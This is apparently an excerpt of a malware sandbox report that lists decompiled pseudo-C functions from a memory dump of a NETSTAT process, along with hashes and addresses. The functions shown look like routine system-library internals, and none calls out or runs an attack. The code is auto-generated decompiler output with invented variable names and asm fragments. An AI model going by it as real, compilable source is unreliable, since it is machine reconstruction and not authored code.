Instruction ID: 4e75f41f9d4745c2a6eaaad0c07bcb847b2d1ccb0326453a17cad22048d35ffe
Opcode Fuzzy Hash: c2b81da4cd5c0bb565c923187b5aa783220f60ef984d6e7c125403cd950ed48b
Instruction Fuzzy Hash: 5D2128724803449BCB11FF2AC944B5FB7DCAF92348F449456F945C7251E730C908C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 02F3070D, Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E02F3070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E02F307DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E02F2AFDE( &_v8,  &_v12);
					E02F31293(_t38, _v28, _t60);
					if(E02E87D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E02F214FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x02f3071b
0x02f30724
0x02f30734
0x02f30738
0x02f3074b
0x02f3074b
0x02f30753
0x02f30753
0x02f30759
0x02f3075d
0x02f30774
0x02f30779
0x02f3077d
0x02f30789
0x02f30795
0x02f307a7
0x02f30797
0x02f307a0
0x02f307a0
0x02f307af
0x02f307c4
0x02f307cd
0x02f307cd
0x02f307af
0x02f307dc

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: d34cb62a68c3159d0f881b23e4e7a61ab35d3d017c419fb0154fd6092f068282
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 8C2107366042049FD716DF58CC80B6ABBA6EFC5390F04866DFA998B381DB30D909CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02E8AE73, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02E8AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E02E87D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E02E87D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E02E87D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E02E87D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E02EE7794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}

0x02e8ae78
0x02e8ae7c
0x02e8ae7e
0x02e8ae81
0x02e8ae86
0x02e8ae8d
0x02ed2691
0x02e8ae93
0x02e8ae93
0x02e8ae93
0x02e8ae98
0x02e8ae9d
0x02ed26a2
0x02ed26b4
0x02ed26a4
0x02ed26ad
0x02ed26ad
0x02ed26b9
0x00000000
0x02ed26bb
0x00000000
0x02ed26bb
0x02e8aea3
0x02e8aea3
0x02e8aea3
0x02e8aeaa
0x02ed26c0
0x02ed26c9
0x02ed26c9
0x02e8aeb3
0x02ed26d4
0x02ed26e1
0x00000000
0x00000000
0x02ed26e7
0x02ed26ee
0x02ed26f0
0x02ed26f9
0x02ed26f9
0x02ed2702
0x02ed2708
0x02ed2708
0x02ed270b
0x02ed270f
0x02ed2711
0x02ed2711
0x02ed2725
0x02ed2725
0x00000000
0x02e8aeb9
0x02e8aeb9
0x02e8aebf
0x02e8aebf
0x02e8aeb3

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: fc21c83b645f48fd87570655811364c836e8f8f152b239efe3955522c91f6b5d
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: D7212936681680CFD721AB64C944B6577E5EF01348F19A0B1EE8C8B3D2E734DC82C790

Uniqueness

Uniqueness Score: -1.00%

Function 02EE7794, Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E02EE7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x2f57b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E02EAF3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E02E87D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E02EA9AE0();
					_t24 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x02ee7799
0x02ee779a
0x02ee779b
0x02ee77a3
0x02ee77ab
0x02ee77ae
0x02ee77b1
0x02ee77b1
0x02ee77bf
0x02ee77c4
0x02ee77c8
0x02ee77ce
0x02ee77d4
0x02ee77e0
0x02ee77e0
0x02ee77d6
0x02ee77d6
0x02ee77de
0x00000000
0x00000000
0x02ee77de
0x02ee77e5
0x02ee77f0
0x02ee77f3
0x02ee77f6
0x02ee77fd
0x02ee7800
0x02ee780c
0x02ee7818
0x02ee782b
0x02ee781a
0x02ee7823
0x02ee7823
0x02ee7830
0x02ee7831
0x02ee7838
0x02ee783d
0x02ee783e
0x02ee784f
0x02ee784f
0x02ee785a

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ebdc233981a7b7d7c58a5e180e98ec57165c33dc161b8177e37ca8a7188611c
Instruction ID: 2dc0117fcc447883a017eb1391f989c914cf64617895a88b1a6c7039fb807aa3
Opcode Fuzzy Hash: 8ebdc233981a7b7d7c58a5e180e98ec57165c33dc161b8177e37ca8a7188611c
Instruction Fuzzy Hash: 6E21A172940614AFCB25DFA9D890E6BB7A9EF48340F10856DF51AC7750E734E900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02E9FD9B, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02E9FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E02E776E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x02e9fd9b
0x02e9fda0
0x02e9fda1
0x02e9fdab
0x02e9fdad
0x02e9fdb0
0x02e9fdb8
0x02e9fe0f
0x02e9fde6
0x02e9fde9
0x02e9fdec
0x02edc0c0
0x02e9fdfe
0x02e9fe06
0x02e9fe06
0x02edc0c8
0x02e9fe2d
0x02e9fe2d
0x00000000
0x02e9fe2d
0x02edc0d1
0x02edc0e0
0x02edc0e5
0x02edc0e5
0x02edc0e8
0x00000000
0x02edc0e8
0x02e9fdf4
0x00000000
0x00000000
0x02e9fdf6
0x02e9fdfa
0x02e9fe1a
0x02e9fe1f
0x02e9fe1f
0x02e9fdfc
0x00000000
0x02e9fdfc
0x02e9fdcc
0x02e9fdd0
0x02e9fe26
0x00000000
0x02e9fe26
0x02e9fdd8
0x02e9fddb
0x02e9fddd
0x02e9fde0
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: b463355dab4d23d34a6a05f4723cf604470a8d93b7a72518d5f85f17c80cc3c5
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: F2217972A80A40DFCB31CF49C540BA6F7E9EB99B18F24D16EE949C7A10D730AC40CB80

Uniqueness

Uniqueness Score: -1.00%

Function 02E69240, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E02E69240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x2f3f708);
				E02EBD08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E02EA95D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E02EA95D0();
				_t33 =  *0x2f584c4; // 0x0
				L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x2f584c4; // 0x0
				L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x2f584c4; // 0x0
				E02E82280(L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2f586b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E02EA95D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E02EA95D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E02E69325();
					_t50 =  *0x2f584c4; // 0x0
					return E02EBD0D1(L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x02e69240
0x02e69242
0x02e69247
0x02e6924c
0x02e6924e
0x02e69255
0x02e69257
0x02e6925a
0x02e6925f
0x02e6925f
0x02e69266
0x02e69271
0x02e69276
0x02e69279
0x02e6927e
0x02e69295
0x02e6929a
0x02e692b1
0x02e692b6
0x02e692d7
0x02e692dc
0x02e692e0
0x02e692e6
0x02e692e8
0x02e692ee
0x02e69332
0x02e69333
0x02e69337
0x02e69338
0x02e6933a
0x02e6933a
0x02e6933d
0x02e69342
0x02e69342
0x02e69345
0x02e69349
0x02e6934e
0x02e69352
0x02e69357
0x02e692f4
0x02e692f4
0x02e692f6
0x02e692f9
0x02e69300
0x02e69306
0x02e69324
0x02e69324

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 87aed7c122c9c8a04a0b77229d04453c5f45795bcd9fbe98223ee210cf86f761
Instruction ID: 5d3f040b38fdc5ed1273eba2a33c1b83ff3e5d112b150e2990d05f98f93e0f0d
Opcode Fuzzy Hash: 87aed7c122c9c8a04a0b77229d04453c5f45795bcd9fbe98223ee210cf86f761
Instruction Fuzzy Hash: 012145314C0640DFC722EF28CA00F6AB7FABF08784F149568A14A976A2CB35E991CF44

Uniqueness

Uniqueness Score: -1.00%

Function 02E9B390, Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02E9B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E02E82280(_t12, 0x2f58608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E02EA00C2(0x2f58608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x02e9b395
0x02e9b3a2
0x02e9b3a5
0x02e9b3aa
0x02e9b3b2
0x02e9b3ba
0x02e9b3bd
0x02e9b3c0
0x02e9b3c4
0x02e9b3c9
0x02eda3e9
0x02eda3ed
0x02eda3f0
0x02eda3ff
0x02eda403
0x02eda409
0x00000000
0x00000000
0x02eda40b
0x02eda40b
0x02eda40f
0x02eda415
0x02eda423
0x02eda423
0x02eda415
0x02e9b3d1
0x02e9b3e8
0x02e9b3e8
0x02e9b3d9

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c872f2399b52dc13f4f809ed10eb52f191734b4f80247dd668d15d17fc1c7c9
Instruction ID: eaf4652e8df0a45154eb51ac587fea9e96565b478a8aab2555c9778f0ab855cf
Opcode Fuzzy Hash: 1c872f2399b52dc13f4f809ed10eb52f191734b4f80247dd668d15d17fc1c7c9
Instruction Fuzzy Hash: 9D116B333911209FCB18DA14DD81A6F7697EBC5374B24A13EEE1AC7380CA31AD02CA94

Uniqueness

Uniqueness Score: -1.00%

Function 02EF4257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E02EF4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x2f408d0);
				E02EBD08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E02EF41E8(__ebx, __edi, __ecx, _t39);
				E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x2f587e4;
					_t18 =  *0x2f587e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x2f55cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x2f587e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x2f587e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L02E67055(_t31 + 0xfffffff8);
								_t24 =  *0x2f587e0; // 0x0
								_t18 = _t24 - 1;
								 *0x2f587e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x2f55cd0;
				if( *0x2f55cd0 <= 0) {
					L02E67055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x2f587e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x2f587e8 = _t30;
						 *0x2f587e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E02EBD0D1(L02EF4320());
			}

0x02ef4257
0x02ef4257
0x02ef4257
0x02ef4259
0x02ef425e
0x02ef4263
0x02ef4265
0x02ef4273
0x02ef4278
0x02ef427c
0x02ef427f
0x02ef4281
0x02ef4287
0x02ef42d7
0x02ef42d7
0x02ef42da
0x02ef428d
0x02ef428d
0x02ef428f
0x02ef4292
0x02ef4297
0x02ef429c
0x02ef42a0
0x02ef42a6
0x02ef42a8
0x02ef42ae
0x02ef42b3
0x00000000
0x02ef42ba
0x02ef42ba
0x02ef42bf
0x02ef42c5
0x02ef42ca
0x02ef42cf
0x02ef42d0
0x00000000
0x02ef42d0
0x02ef42b3
0x00000000
0x02ef42a6
0x02ef429c
0x02ef42dc
0x02ef42dc
0x02ef42e3
0x02ef4309
0x02ef42e5
0x02ef42e5
0x02ef42e8
0x02ef42ee
0x02ef42f0
0x00000000
0x02ef42f2
0x02ef42f2
0x02ef42f4
0x02ef42f7
0x02ef42f9
0x02ef4300
0x02ef4300
0x02ef42f0
0x02ef430e
0x02ef431f

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 271d65d25895171319881a1ea0a7872bb171ddfeea9280c8f124b2de5f1ac260
Instruction ID: 11ffa473d547d42ebddafadbd3d891c1081791d5f96563afc9db1146548a607d
Opcode Fuzzy Hash: 271d65d25895171319881a1ea0a7872bb171ddfeea9280c8f124b2de5f1ac260
Instruction Fuzzy Hash: 712158709C1718CFD795EF28E100A56BBF2FB85398B50EAAAD3098B290DB359491CF00

Uniqueness

Uniqueness Score: -1.00%

Function 02E92397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E02E92397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x2f5848c != 0) {
					L02E8FAD0(0x2f58610);
					if( *0x2f5848c == 0) {
						E02E8FA00(0x2f58610, _t19, _t27, 0x2f58610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E02E92581(0x2f58610, 0x2e450a0, _t26, _t27, _t28);
						E02E8FA00(0x2f58610, 0x2e450a0, _t27, 0x2f58610);
					}
				} else {
					L1:
					_t11 =  *0x2f58614; // 0x1
					if(_t11 == 0) {
						_t11 = E02EA4886(0x2e41088, 1, 0x2f58614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E02E92581(0x2f58610, (_t11 << 4) + 0x2e45070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x02e923b0
0x02e923b6
0x02e92409
0x02e92415
0x02ed5ae9
0x00000000
0x02e9241b
0x02e9241b
0x02e9241d
0x02e92427
0x02e9242e
0x02e92430
0x02e92430
0x02e923b8
0x02e923b8
0x02e923b8
0x02e923bf
0x02e923fc
0x02e923fc
0x02e923c1
0x02e923c3
0x02e923d0
0x02e923d8
0x02e923d8
0x02e923dc
0x02e923de
0x02e923e1
0x02e923e1
0x02e923ec

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ddc3a75670e0c274ea6bdf60c47f92dbcd4e1146b77b0579c7328b8a435463f
Instruction ID: 34830824247e3ce0357ca410ccace4783dc891a9bd4fd3aa1f8fea06bcbac6e9
Opcode Fuzzy Hash: 1ddc3a75670e0c274ea6bdf60c47f92dbcd4e1146b77b0579c7328b8a435463f
Instruction Fuzzy Hash: 8C1108316C031177DF20E629AC80B16B6C9ABA07A4F54E427FF06AB190CAB0E841CE54

Uniqueness

Uniqueness Score: -1.00%

Function 02EE46A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02EE46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E02EAF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E02E9D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L02E877F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x02ee46b7
0x02ee46ba
0x02ee46c5
0x02ee46c8
0x02ee46d0
0x02ee46d4
0x02ee46e6
0x02ee46e9
0x02ee46f4
0x02ee46ff
0x02ee4705
0x02ee4706
0x02ee470c
0x02ee4713
0x02ee471b
0x02ee4723
0x02ee4725
0x02ee46d6
0x02ee46d9
0x02ee46db
0x02ee46db
0x02ee4732

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
